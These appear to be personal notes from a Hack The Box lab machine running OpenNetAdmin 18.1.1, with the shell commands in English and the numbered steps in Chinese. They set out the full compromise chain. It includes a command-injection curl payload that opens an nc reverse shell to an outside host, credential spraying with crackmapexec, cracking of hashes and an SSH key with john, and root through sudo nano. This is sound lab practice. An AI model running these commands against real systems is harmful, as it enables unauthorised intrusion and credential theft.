nmap -sC -sV -Pn 10.129.1.145 > namp.txt
nmap -p- 10.129.1.145 > nampall.txt

gobuster dir  -u http://10.129.1.145/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi  > gobuster.txt





o Colorlib can't be removed. Template is licensed under CC BY 3.0.


curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 4444 >/tmp/f";echo \"END\"&xajaxargs[]=ping" http://10.129.1.145/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";;echo \"END\"&xajaxargs[]=ping" http://10.129.1.145/ona/

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 4444 >/tmp/f


db_host' => 'localhost',
db_login' => 'ona_sys',
db_passwd' => 'n1nj4W4rri0R!',
db_database' => 'ona_default',
db_debug' => false,

mysql -u ona_sys -p


  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |
  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |



 ssh jimmy@10.129.1.145

127.0.0.1:


1.nmap掃描發現80端口,gobuster找到/music
2.訪問/music頁面的login跳轉到/ona
3.顯示服務是opennetadmin服務18.1.1版本
4.上網查到python的漏洞腳本,取得reverse shell
5.取得reverse shell後重新套接一層正常的reverse shell
6.在ona工作目錄下找到DB配置的帳號密碼
7.會總計有的用戶及密碼使用crackmapexec嘗試ssh登入
/opt/crackmapexec/poetry run crackmapexec ssh 10.129.1.145  -u ~/timmy/hackthebox/Openadmin/users.txt -p ~/timmy/hackthebox/Openadmin/passwords.txt
8.發現用戶 jimmy:n1nj4W4rri0R!,使用ssh登入
9.在/var/www/internal/index.php查看到密碼hash,解出密碼為
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1:Revealed
10.SSH tunnel把52846 隧道回本地訪問
ssh -L52846:localhost:52846 jimmy@10.129.1.145
11.登入使用jimmy:Revealed登入頁面後得到private key
12.將private_key轉成可以破解的john hash格式
/usr/share/john/ssh2john.py id_rsa > crypt_key
13.使用john破解hash得到密碼bloodninjas
john crypt_key --wordlist=/usr/share/wordlists/rockyou.txt
14. ssh及密鑰密碼登入joanna
ssh -i id_rsa joanna@10.129.1.145
15.查看sudo -l 有sudo nano
根據gtfobin 取得root
